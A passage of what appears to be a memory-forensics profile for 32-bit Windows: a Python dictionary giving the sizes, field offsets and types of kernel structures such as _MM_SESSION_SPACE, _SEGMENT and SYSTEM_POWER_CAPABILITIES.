'Thread' : [ 0x8, ['pointer', ['_ETHREAD']]],
'StackTrace' : [ 0xc, ['array', 13, ['pointer', ['void']]]],
} ],
'__unnamed_20df' : [ 0x4, {
'LongFlags' : [ 0x0, ['unsigned long']],
'Flags' : [ 0x0, ['_MM_SESSION_SPACE_FLAGS']],
} ],
'_MM_SESSION_SPACE' : [ 0x2000, {
'ReferenceCount' : [ 0x0, ['long']],
'u' : [ 0x4, ['__unnamed_20df']],
'SessionId' : [ 0x8, ['unsigned long']],
'ProcessReferenceToSession' : [ 0xc, ['long']],
'ProcessList' : [ 0x10, ['_LIST_ENTRY']],
'LastProcessSwappedOutTime' : [ 0x18, ['_LARGE_INTEGER']],
'SessionPageDirectoryIndex' : [ 0x20, ['unsigned long']],
'NonPagablePages' : [ 0x24, ['unsigned long']],
'CommittedPages' : [ 0x28, ['unsigned long']],
'PagedPoolStart' : [ 0x2c, ['pointer', ['void']]],
'PagedPoolEnd' : [ 0x30, ['pointer', ['void']]],
'SessionObject' : [ 0x34, ['pointer', ['void']]],
'SessionObjectHandle' : [ 0x38, ['pointer', ['void']]],
'ResidentProcessCount' : [ 0x3c, ['long']],
'SessionPoolAllocationFailures' : [ 0x40, ['array', 4, ['unsigned long']]],
'ImageList' : [ 0x50, ['_LIST_ENTRY']],
'LocaleId' : [ 0x58, ['unsigned long']],
'AttachCount' : [ 0x5c, ['unsigned long']],
'AttachGate' : [ 0x60, ['_KGATE']],
'WsListEntry' : [ 0x70, ['_LIST_ENTRY']],
'Lookaside' : [ 0x80, ['array', 25, ['_GENERAL_LOOKASIDE']]],
'Session' : [ 0xd00, ['_MMSESSION']],
'PagedPoolInfo' : [ 0xd38, ['_MM_PAGED_POOL_INFO']],
'Vm' : [ 0xd70, ['_MMSUPPORT']],
'Wsle' : [ 0xddc, ['pointer', ['_MMWSLE']]],
'DriverUnload' : [ 0xde0, ['pointer', ['void']]],
'PagedPool' : [ 0xe00, ['_POOL_DESCRIPTOR']],
'PageTables' : [ 0x1f40, ['pointer', ['_MMPTE']]],
'SpecialPool' : [ 0x1f44, ['_MI_SPECIAL_POOL']],
'SessionPteLock' : [ 0x1f68, ['_KGUARDED_MUTEX']],
'PoolBigEntriesInUse' : [ 0x1f88, ['long']],
'PagedPoolPdeCount' : [ 0x1f8c, ['unsigned long']],
'SpecialPoolPdeCount' : [ 0x1f90, ['unsigned long']],
'DynamicSessionPdeCount' : [ 0x1f94, ['unsigned long']],
'SystemPteInfo' : [ 0x1f98, ['_MI_SYSTEM_PTE_TYPE']],
'PoolTrackTableExpansion' : [ 0x1fc8, ['pointer', ['void']]],
'PoolTrackTableExpansionSize' : [ 0x1fcc, ['unsigned long']],
'PoolTrackBigPages' : [ 0x1fd0, ['pointer', ['void']]],
'PoolTrackBigPagesSize' : [ 0x1fd4, ['unsigned long']],
'IoState' : [ 0x1fd8, ['Enumeration', dict(target = 'long', choices = {1: 'IoSessionStateCreated', 2: 'IoSessionStateInitialized', 3: 'IoSessionStateConnected', 4: 'IoSessionStateDisconnected', 5: 'IoSessionStateDisconnectedLoggedOn', 6: 'IoSessionStateLoggedOn', 7: 'IoSessionStateLoggedOff', 8: 'IoSessionStateTerminated', 9: 'IoSessionStateMax'})]],
'IoStateSequence' : [ 0x1fdc, ['unsigned long']],
'IoNotificationEvent' : [ 0x1fe0, ['_KEVENT']],
'SessionPoolPdes' : [ 0x1ff0, ['_RTL_BITMAP']],
'CpuQuotaBlock' : [ 0x1ff8, ['pointer', ['_PS_CPU_QUOTA_BLOCK']]],
} ],
'_OBJECT_HANDLE_COUNT_ENTRY' : [ 0x8, {
'Process' : [ 0x0, ['pointer', ['_EPROCESS']]],
'HandleCount' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 24, native_type='unsigned long')]],
'LockCount' : [ 0x4, ['BitField', dict(start_bit = 24, end_bit = 32, native_type='unsigned long')]],
} ],
'_CLIENT_ID' : [ 0x8, {
'UniqueProcess' : [ 0x0, ['pointer', ['void']]],
'UniqueThread' : [ 0x4, ['pointer', ['void']]],
} ],
'_WHEA_MEMORY_ERROR_SECTION' : [ 0x49, {
'ValidBits' : [ 0x0, ['_WHEA_MEMORY_ERROR_SECTION_VALIDBITS']],
'ErrorStatus' : [ 0x8, ['_WHEA_ERROR_STATUS']],
'PhysicalAddress' : [ 0x10, ['unsigned long long']],
'PhysicalAddressMask' : [ 0x18, ['unsigned long long']],
'Node' : [ 0x20, ['unsigned short']],
'Card' : [ 0x22, ['unsigned short']],
'Module' : [ 0x24, ['unsigned short']],
'Bank' : [ 0x26, ['unsigned short']],
'Device' : [ 0x28, ['unsigned short']],
'Row' : [ 0x2a, ['unsigned short']],
'Column' : [ 0x2c, ['unsigned short']],
'BitPosition' : [ 0x2e, ['unsigned short']],
'RequesterId' : [ 0x30, ['unsigned long long']],
'ResponderId' : [ 0x38, ['unsigned long long']],
'TargetId' : [ 0x40, ['unsigned long long']],
'ErrorType' : [ 0x48, ['unsigned char']],
} ],
'_KWAIT_STATUS_REGISTER' : [ 0x1, {
'Flags' : [ 0x0, ['unsigned char']],
'State' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 2, native_type='unsigned char')]],
'Affinity' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'Priority' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'Apc' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'UserApc' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'Alert' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'Unused' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
} ],
'_VI_DEADLOCK_RESOURCE' : [ 0x80, {
'Type' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'VfDeadlockUnknown', 1: 'VfDeadlockMutex', 2: 'VfDeadlockMutexAbandoned', 3: 'VfDeadlockFastMutex', 4: 'VfDeadlockFastMutexUnsafe', 5: 'VfDeadlockSpinLock', 6: 'VfDeadlockInStackQueuedSpinLock', 7: 'VfDeadlockUnusedSpinLock', 8: 'VfDeadlockEresource', 9: 'VfDeadlockTypeMaximum'})]],
'NodeCount' : [ 0x4, ['BitField', dict(start_bit = 0, end_bit = 16, native_type='unsigned long')]],
'RecursionCount' : [ 0x4, ['BitField', dict(start_bit = 16, end_bit = 32, native_type='unsigned long')]],
'ResourceAddress' : [ 0x8, ['pointer', ['void']]],
'ThreadOwner' : [ 0xc, ['pointer', ['_VI_DEADLOCK_THREAD']]],
'ResourceList' : [ 0x10, ['_LIST_ENTRY']],
'HashChainList' : [ 0x18, ['_LIST_ENTRY']],
'FreeListEntry' : [ 0x18, ['_LIST_ENTRY']],
'StackTrace' : [ 0x20, ['array', 8, ['pointer', ['void']]]],
'LastAcquireTrace' : [ 0x40, ['array', 8, ['pointer', ['void']]]],
'LastReleaseTrace' : [ 0x60, ['array', 8, ['pointer', ['void']]]],
} ],
'_DBGKD_GET_SET_BUS_DATA' : [ 0x14, {
'BusDataType' : [ 0x0, ['unsigned long']],
'BusNumber' : [ 0x4, ['unsigned long']],
'SlotNumber' : [ 0x8, ['unsigned long']],
'Offset' : [ 0xc, ['unsigned long']],
'Length' : [ 0x10, ['unsigned long']],
} ],
'_MMSECTION_FLAGS' : [ 0x4, {
'BeingDeleted' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'BeingCreated' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'BeingPurged' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'NoModifiedWriting' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'FailAllIo' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Image' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Based' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'File' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'Networked' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'Rom' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'PhysicalMemory' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'CopyOnWrite' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'Reserve' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'Commit' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'Accessed' : [ 0x0, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'WasPurged' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'UserReference' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'GlobalMemory' : [ 0x0, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'DeleteOnClose' : [ 0x0, ['BitField', dict(start_bit = 18, end_bit = 19, native_type='unsigned long')]],
'FilePointerNull' : [ 0x0, ['BitField', dict(start_bit = 19, end_bit = 20, native_type='unsigned long')]],
'GlobalOnlyPerSession' : [ 0x0, ['BitField', dict(start_bit = 20, end_bit = 21, native_type='unsigned long')]],
'SetMappedFileIoComplete' : [ 0x0, ['BitField', dict(start_bit = 21, end_bit = 22, native_type='unsigned long')]],
'CollidedFlush' : [ 0x0, ['BitField', dict(start_bit = 22, end_bit = 23, native_type='unsigned long')]],
'NoChange' : [ 0x0, ['BitField', dict(start_bit = 23, end_bit = 24, native_type='unsigned long')]],
'Spare' : [ 0x0, ['BitField', dict(start_bit = 24, end_bit = 25, native_type='unsigned long')]],
'UserWritable' : [ 0x0, ['BitField', dict(start_bit = 25, end_bit = 26, native_type='unsigned long')]],
'PreferredNode' : [ 0x0, ['BitField', dict(start_bit = 26, end_bit = 32, native_type='unsigned long')]],
} ],
'_SECURITY_CLIENT_CONTEXT' : [ 0x3c, {
'SecurityQos' : [ 0x0, ['_SECURITY_QUALITY_OF_SERVICE']],
'ClientToken' : [ 0xc, ['pointer', ['void']]],
'DirectlyAccessClientToken' : [ 0x10, ['unsigned char']],
'DirectAccessEffectiveOnly' : [ 0x11, ['unsigned char']],
'ServerIsRemote' : [ 0x12, ['unsigned char']],
'ClientTokenControl' : [ 0x14, ['_TOKEN_CONTROL']],
} ],
'_MM_PAGED_POOL_INFO' : [ 0x38, {
'Mutex' : [ 0x0, ['_KGUARDED_MUTEX']],
'PagedPoolAllocationMap' : [ 0x20, ['_RTL_BITMAP']],
'FirstPteForPagedPool' : [ 0x28, ['pointer', ['_MMPTE']]],
'PagedPoolHint' : [ 0x2c, ['unsigned long']],
'PagedPoolCommit' : [ 0x30, ['unsigned long']],
'AllocatedPagedPool' : [ 0x34, ['unsigned long']],
} ],
'_BITMAP_RANGE' : [ 0x20, {
'Links' : [ 0x0, ['_LIST_ENTRY']],
'BasePage' : [ 0x8, ['long long']],
'FirstDirtyPage' : [ 0x10, ['unsigned long']],
'LastDirtyPage' : [ 0x14, ['unsigned long']],
'DirtyPages' : [ 0x18, ['unsigned long']],
'Bitmap' : [ 0x1c, ['pointer', ['unsigned long']]],
} ],
'_IO_SECURITY_CONTEXT' : [ 0x10, {
'SecurityQos' : [ 0x0, ['pointer', ['_SECURITY_QUALITY_OF_SERVICE']]],
'AccessState' : [ 0x4, ['pointer', ['_ACCESS_STATE']]],
'DesiredAccess' : [ 0x8, ['unsigned long']],
'FullCreateOptions' : [ 0xc, ['unsigned long']],
} ],
'_PROC_PERF_DOMAIN' : [ 0x78, {
'Link' : [ 0x0, ['_LIST_ENTRY']],
'Master' : [ 0x8, ['pointer', ['_KPRCB']]],
'Members' : [ 0xc, ['_KAFFINITY_EX']],
'FeedbackHandler' : [ 0x18, ['pointer', ['void']]],
'GetFFHThrottleState' : [ 0x1c, ['pointer', ['void']]],
'BoostPolicyHandler' : [ 0x20, ['pointer', ['void']]],
'PerfSelectionHandler' : [ 0x24, ['pointer', ['void']]],
'PerfHandler' : [ 0x28, ['pointer', ['void']]],
'Processors' : [ 0x2c, ['pointer', ['_PROC_PERF_CONSTRAINT']]],
'PerfChangeTime' : [ 0x30, ['unsigned long long']],
'ProcessorCount' : [ 0x38, ['unsigned long']],
'PreviousFrequencyMhz' : [ 0x3c, ['unsigned long']],
'CurrentFrequencyMhz' : [ 0x40, ['unsigned long']],
'PreviousFrequency' : [ 0x44, ['unsigned long']],
'CurrentFrequency' : [ 0x48, ['unsigned long']],
'CurrentPerfContext' : [ 0x4c, ['unsigned long']],
'DesiredFrequency' : [ 0x50, ['unsigned long']],
'MaxFrequency' : [ 0x54, ['unsigned long']],
'MinPerfPercent' : [ 0x58, ['unsigned long']],
'MinThrottlePercent' : [ 0x5c, ['unsigned long']],
'MaxPercent' : [ 0x60, ['unsigned long']],
'MinPercent' : [ 0x64, ['unsigned long']],
'ConstrainedMaxPercent' : [ 0x68, ['unsigned long']],
'ConstrainedMinPercent' : [ 0x6c, ['unsigned long']],
'Coordination' : [ 0x70, ['unsigned char']],
'PerfChangeIntervalCount' : [ 0x74, ['long']],
} ],
'_X86_DBGKD_CONTROL_SET' : [ 0x10, {
'TraceFlag' : [ 0x0, ['unsigned long']],
'Dr7' : [ 0x4, ['unsigned long']],
'CurrentSymbolStart' : [ 0x8, ['unsigned long']],
'CurrentSymbolEnd' : [ 0xc, ['unsigned long']],
} ],
'_HANDLE_TRACE_DB_ENTRY' : [ 0x50, {
'ClientId' : [ 0x0, ['_CLIENT_ID']],
'Handle' : [ 0x8, ['pointer', ['void']]],
'Type' : [ 0xc, ['unsigned long']],
'StackTrace' : [ 0x10, ['array', 16, ['pointer', ['void']]]],
} ],
'_TP_NBQ_GUARD' : [ 0x10, {
'GuardLinks' : [ 0x0, ['_LIST_ENTRY']],
'Guards' : [ 0x8, ['array', 2, ['pointer', ['void']]]],
} ],
'_DUMMY_FILE_OBJECT' : [ 0xa0, {
'ObjectHeader' : [ 0x0, ['_OBJECT_HEADER']],
'FileObjectBody' : [ 0x20, ['array', 128, ['unsigned char']]],
} ],
'_POP_TRIGGER_WAIT' : [ 0x20, {
'Event' : [ 0x0, ['_KEVENT']],
'Status' : [ 0x10, ['long']],
'Link' : [ 0x14, ['_LIST_ENTRY']],
'Trigger' : [ 0x1c, ['pointer', ['_POP_ACTION_TRIGGER']]],
} ],
'_RELATION_LIST' : [ 0x14, {
'Count' : [ 0x0, ['unsigned long']],
'TagCount' : [ 0x4, ['unsigned long']],
'FirstLevel' : [ 0x8, ['unsigned long']],
'MaxLevel' : [ 0xc, ['unsigned long']],
'Entries' : [ 0x10, ['array', 1, ['pointer', ['_RELATION_LIST_ENTRY']]]],
} ],
'_IO_TIMER' : [ 0x18, {
'Type' : [ 0x0, ['short']],
'TimerFlag' : [ 0x2, ['short']],
'TimerList' : [ 0x4, ['_LIST_ENTRY']],
'TimerRoutine' : [ 0xc, ['pointer', ['void']]],
'Context' : [ 0x10, ['pointer', ['void']]],
'DeviceObject' : [ 0x14, ['pointer', ['_DEVICE_OBJECT']]],
} ],
'_ARBITER_TEST_ALLOCATION_PARAMETERS' : [ 0xc, {
'ArbitrationList' : [ 0x0, ['pointer', ['_LIST_ENTRY']]],
'AllocateFromCount' : [ 0x4, ['unsigned long']],
'AllocateFrom' : [ 0x8, ['pointer', ['_CM_PARTIAL_RESOURCE_DESCRIPTOR']]],
} ],
'_MI_SPECIAL_POOL' : [ 0x24, {
'PteBase' : [ 0x0, ['pointer', ['_MMPTE']]],
'Lock' : [ 0x4, ['unsigned long']],
'Paged' : [ 0x8, ['_MI_SPECIAL_POOL_PTE_LIST']],
'NonPaged' : [ 0x10, ['_MI_SPECIAL_POOL_PTE_LIST']],
'PagesInUse' : [ 0x18, ['long']],
'SpecialPoolPdes' : [ 0x1c, ['_RTL_BITMAP']],
} ],
'_ARBITER_QUERY_CONFLICT_PARAMETERS' : [ 0x10, {
'PhysicalDeviceObject' : [ 0x0, ['pointer', ['_DEVICE_OBJECT']]],
'ConflictingResource' : [ 0x4, ['pointer', ['_IO_RESOURCE_DESCRIPTOR']]],
'ConflictCount' : [ 0x8, ['pointer', ['unsigned long']]],
'Conflicts' : [ 0xc, ['pointer', ['pointer', ['_ARBITER_CONFLICT_INFO']]]],
} ],
'_PHYSICAL_MEMORY_DESCRIPTOR' : [ 0x10, {
'NumberOfRuns' : [ 0x0, ['unsigned long']],
'NumberOfPages' : [ 0x4, ['unsigned long']],
'Run' : [ 0x8, ['array', 1, ['_PHYSICAL_MEMORY_RUN']]],
} ],
'_PNP_DEVICE_EVENT_LIST' : [ 0x4c, {
'Status' : [ 0x0, ['long']],
'EventQueueMutex' : [ 0x4, ['_KMUTANT']],
'Lock' : [ 0x24, ['_KGUARDED_MUTEX']],
'List' : [ 0x44, ['_LIST_ENTRY']],
} ],
'_MAILSLOT_CREATE_PARAMETERS' : [ 0x18, {
'MailslotQuota' : [ 0x0, ['unsigned long']],
'MaximumMessageSize' : [ 0x4, ['unsigned long']],
'ReadTimeout' : [ 0x8, ['_LARGE_INTEGER']],
'TimeoutSpecified' : [ 0x10, ['unsigned char']],
} ],
'_PO_IRP_MANAGER' : [ 0x10, {
'DeviceIrpQueue' : [ 0x0, ['_PO_IRP_QUEUE']],
'SystemIrpQueue' : [ 0x8, ['_PO_IRP_QUEUE']],
} ],
'_PPM_PERF_STATE' : [ 0x28, {
'Frequency' : [ 0x0, ['unsigned long']],
'Power' : [ 0x4, ['unsigned long']],
'PercentFrequency' : [ 0x8, ['unsigned char']],
'IncreaseLevel' : [ 0x9, ['unsigned char']],
'DecreaseLevel' : [ 0xa, ['unsigned char']],
'Type' : [ 0xb, ['unsigned char']],
'Control' : [ 0x10, ['unsigned long long']],
'Status' : [ 0x18, ['unsigned long long']],
'TotalHitCount' : [ 0x20, ['unsigned long']],
'DesiredCount' : [ 0x24, ['unsigned long']],
} ],
'_PPM_FFH_THROTTLE_STATE_INFO' : [ 0x20, {
'EnableLogging' : [ 0x0, ['unsigned char']],
'MismatchCount' : [ 0x4, ['unsigned long']],
'Initialized' : [ 0x8, ['unsigned char']],
'LastValue' : [ 0x10, ['unsigned long long']],
'LastLogTickCount' : [ 0x18, ['_LARGE_INTEGER']],
} ],
'_SECURITY_DESCRIPTOR_RELATIVE' : [ 0x14, {
'Revision' : [ 0x0, ['unsigned char']],
'Sbz1' : [ 0x1, ['unsigned char']],
'Control' : [ 0x2, ['unsigned short']],
'Owner' : [ 0x4, ['unsigned long']],
'Group' : [ 0x8, ['unsigned long']],
'Sacl' : [ 0xc, ['unsigned long']],
'Dacl' : [ 0x10, ['unsigned long']],
} ],
'_CLIENT_ID64' : [ 0x10, {
'UniqueProcess' : [ 0x0, ['unsigned long long']],
'UniqueThread' : [ 0x8, ['unsigned long long']],
} ],
'_KDPC_DATA' : [ 0x14, {
'DpcListHead' : [ 0x0, ['_LIST_ENTRY']],
'DpcLock' : [ 0x8, ['unsigned long']],
'DpcQueueDepth' : [ 0xc, ['long']],
'DpcCount' : [ 0x10, ['unsigned long']],
} ],
'_NAMED_PIPE_CREATE_PARAMETERS' : [ 0x28, {
'NamedPipeType' : [ 0x0, ['unsigned long']],
'ReadMode' : [ 0x4, ['unsigned long']],
'CompletionMode' : [ 0x8, ['unsigned long']],
'MaximumInstances' : [ 0xc, ['unsigned long']],
'InboundQuota' : [ 0x10, ['unsigned long']],
'OutboundQuota' : [ 0x14, ['unsigned long']],
'DefaultTimeout' : [ 0x18, ['_LARGE_INTEGER']],
'TimeoutSpecified' : [ 0x20, ['unsigned char']],
} ],
'_CM_BIG_DATA' : [ 0x8, {
'Signature' : [ 0x0, ['unsigned short']],
'Count' : [ 0x2, ['unsigned short']],
'List' : [ 0x4, ['unsigned long']],
} ],
'__unnamed_216f' : [ 0x8, {
'UserData' : [ 0x0, ['pointer', ['void']]],
'Owner' : [ 0x4, ['pointer', ['void']]],
} ],
'__unnamed_2171' : [ 0x8, {
'ListHead' : [ 0x0, ['_LIST_ENTRY']],
} ],
'_RTLP_RANGE_LIST_ENTRY' : [ 0x28, {
'Start' : [ 0x0, ['unsigned long long']],
'End' : [ 0x8, ['unsigned long long']],
'Allocated' : [ 0x10, ['__unnamed_216f']],
'Merged' : [ 0x10, ['__unnamed_2171']],
'Attributes' : [ 0x18, ['unsigned char']],
'PublicFlags' : [ 0x19, ['unsigned char']],
'PrivateFlags' : [ 0x1a, ['unsigned short']],
'ListEntry' : [ 0x1c, ['_LIST_ENTRY']],
} ],
'_ALPC_COMPLETION_PACKET_LOOKASIDE_ENTRY' : [ 0xc, {
'ListEntry' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Packet' : [ 0x4, ['pointer', ['_IO_MINI_COMPLETION_PACKET_USER']]],
'Lookaside' : [ 0x8, ['pointer', ['_ALPC_COMPLETION_PACKET_LOOKASIDE']]],
} ],
'__unnamed_2179' : [ 0x2, {
'AsUSHORT' : [ 0x0, ['unsigned short']],
'AllowScaling' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned short')]],
'Disabled' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned short')]],
'Reserved' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 16, native_type='unsigned short')]],
} ],
'PROCESSOR_IDLESTATE_POLICY' : [ 0x20, {
'Revision' : [ 0x0, ['unsigned short']],
'Flags' : [ 0x2, ['__unnamed_2179']],
'PolicyCount' : [ 0x4, ['unsigned long']],
'Policy' : [ 0x8, ['array', 3, ['PROCESSOR_IDLESTATE_INFO']]],
} ],
'_ACTIVATION_CONTEXT_STACK' : [ 0x18, {
'ActiveFrame' : [ 0x0, ['pointer', ['_RTL_ACTIVATION_CONTEXT_STACK_FRAME']]],
'FrameListCache' : [ 0x4, ['_LIST_ENTRY']],
'Flags' : [ 0xc, ['unsigned long']],
'NextCookieSequenceNumber' : [ 0x10, ['unsigned long']],
'StackId' : [ 0x14, ['unsigned long']],
} ],
'_MSUBSECTION' : [ 0x38, {
'ControlArea' : [ 0x0, ['pointer', ['_CONTROL_AREA']]],
'SubsectionBase' : [ 0x4, ['pointer', ['_MMPTE']]],
'NextSubsection' : [ 0x8, ['pointer', ['_SUBSECTION']]],
'NextMappedSubsection' : [ 0x8, ['pointer', ['_MSUBSECTION']]],
'PtesInSubsection' : [ 0xc, ['unsigned long']],
'UnusedPtes' : [ 0x10, ['unsigned long']],
'GlobalPerSessionHead' : [ 0x10, ['pointer', ['_MM_AVL_TABLE']]],
'u' : [ 0x14, ['__unnamed_1ef2']],
'StartingSector' : [ 0x18, ['unsigned long']],
'NumberOfFullSectors' : [ 0x1c, ['unsigned long']],
'u1' : [ 0x20, ['__unnamed_1f80']],
'LeftChild' : [ 0x24, ['pointer', ['_MMSUBSECTION_NODE']]],
'RightChild' : [ 0x28, ['pointer', ['_MMSUBSECTION_NODE']]],
'DereferenceList' : [ 0x2c, ['_LIST_ENTRY']],
'NumberOfMappedViews' : [ 0x34, ['unsigned long']],
} ],
'_RTL_DRIVE_LETTER_CURDIR' : [ 0x10, {
'Flags' : [ 0x0, ['unsigned short']],
'Length' : [ 0x2, ['unsigned short']],
'TimeStamp' : [ 0x4, ['unsigned long']],
'DosPath' : [ 0x8, ['_STRING']],
} ],
'_VIRTUAL_EFI_RUNTIME_SERVICES' : [ 0x38, {
'GetTime' : [ 0x0, ['unsigned long']],
'SetTime' : [ 0x4, ['unsigned long']],
'GetWakeupTime' : [ 0x8, ['unsigned long']],
'SetWakeupTime' : [ 0xc, ['unsigned long']],
'SetVirtualAddressMap' : [ 0x10, ['unsigned long']],
'ConvertPointer' : [ 0x14, ['unsigned long']],
'GetVariable' : [ 0x18, ['unsigned long']],
'GetNextVariableName' : [ 0x1c, ['unsigned long']],
'SetVariable' : [ 0x20, ['unsigned long']],
'GetNextHighMonotonicCount' : [ 0x24, ['unsigned long']],
'ResetSystem' : [ 0x28, ['unsigned long']],
'UpdateCapsule' : [ 0x2c, ['unsigned long']],
'QueryCapsuleCapabilities' : [ 0x30, ['unsigned long']],
'QueryVariableInfo' : [ 0x34, ['unsigned long']],
} ],
'_MI_SPECIAL_POOL_PTE_LIST' : [ 0x8, {
'FreePteHead' : [ 0x0, ['_MMPTE']],
'FreePteTail' : [ 0x4, ['_MMPTE']],
} ],
'SYSTEM_POWER_CAPABILITIES' : [ 0x4c, {
'PowerButtonPresent' : [ 0x0, ['unsigned char']],
'SleepButtonPresent' : [ 0x1, ['unsigned char']],
'LidPresent' : [ 0x2, ['unsigned char']],
'SystemS1' : [ 0x3, ['unsigned char']],
'SystemS2' : [ 0x4, ['unsigned char']],
'SystemS3' : [ 0x5, ['unsigned char']],
'SystemS4' : [ 0x6, ['unsigned char']],
'SystemS5' : [ 0x7, ['unsigned char']],
'HiberFilePresent' : [ 0x8, ['unsigned char']],
'FullWake' : [ 0x9, ['unsigned char']],
'VideoDimPresent' : [ 0xa, ['unsigned char']],
'ApmPresent' : [ 0xb, ['unsigned char']],
'UpsPresent' : [ 0xc, ['unsigned char']],
'ThermalControl' : [ 0xd, ['unsigned char']],
'ProcessorThrottle' : [ 0xe, ['unsigned char']],
'ProcessorMinThrottle' : [ 0xf, ['unsigned char']],
'ProcessorMaxThrottle' : [ 0x10, ['unsigned char']],
'FastSystemS4' : [ 0x11, ['unsigned char']],
'spare2' : [ 0x12, ['array', 3, ['unsigned char']]],
'DiskSpinDown' : [ 0x15, ['unsigned char']],
'spare3' : [ 0x16, ['array', 8, ['unsigned char']]],
'SystemBatteriesPresent' : [ 0x1e, ['unsigned char']],
'BatteriesAreShortTerm' : [ 0x1f, ['unsigned char']],
'BatteryScale' : [ 0x20, ['array', 3, ['BATTERY_REPORTING_SCALE']]],
'AcOnLineWake' : [ 0x38, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'SoftLidWake' : [ 0x3c, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'RtcWake' : [ 0x40, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'MinDeviceWakeState' : [ 0x44, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
'DefaultLowLatencyWake' : [ 0x48, ['Enumeration', dict(target = 'long', choices = {0: 'PowerSystemUnspecified', 1: 'PowerSystemWorking', 2: 'PowerSystemSleeping1', 3: 'PowerSystemSleeping2', 4: 'PowerSystemSleeping3', 5: 'PowerSystemHibernate', 6: 'PowerSystemShutdown', 7: 'PowerSystemMaximum'})]],
} ],
'__unnamed_218f' : [ 0x4, {
'ImageCommitment' : [ 0x0, ['unsigned long']],
'CreatingProcess' : [ 0x0, ['pointer', ['_EPROCESS']]],
} ],
'__unnamed_2193' : [ 0x4, {
'ImageInformation' : [ 0x0, ['pointer', ['_MI_SECTION_IMAGE_INFORMATION']]],
'FirstMappedVa' : [ 0x0, ['pointer', ['void']]],
} ],
'_SEGMENT' : [ 0x30, {
'ControlArea' : [ 0x0, ['pointer', ['_CONTROL_AREA']]],
'TotalNumberOfPtes' : [ 0x4, ['unsigned long']],
'SegmentFlags' : [ 0x8, ['_SEGMENT_FLAGS']],
'NumberOfCommittedPages' : [ 0xc, ['unsigned long']],
'SizeOfSegment' : [ 0x10, ['unsigned long long']],
'ExtendInfo' : [ 0x18, ['pointer', ['_MMEXTEND_INFO']]],
'BasedAddress' : [ 0x18, ['pointer', ['void']]],
'SegmentLock' : [ 0x1c, ['_EX_PUSH_LOCK']],
'u1' : [ 0x20, ['__unnamed_218f']],
'u2' : [ 0x24, ['__unnamed_2193']],
'PrototypePte' : [ 0x28, ['pointer', ['_MMPTE']]],
'ThePtes' : [ 0x2c, ['array', 1, ['_MMPTE']]],
} ],
'_DIAGNOSTIC_CONTEXT' : [ 0x10, {
'CallerType' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'KernelRequester', 1: 'UserProcessRequester', 2: 'UserSharedServiceRequester'})]],
'Process' : [ 0x4, ['pointer', ['_EPROCESS']]],
'ServiceTag' : [ 0x8, ['unsigned long']],
'DeviceObject' : [ 0x4, ['pointer', ['_DEVICE_OBJECT']]],
'ReasonSize' : [ 0xc, ['unsigned long']],
} ],
'__unnamed_219c' : [ 0x4, {
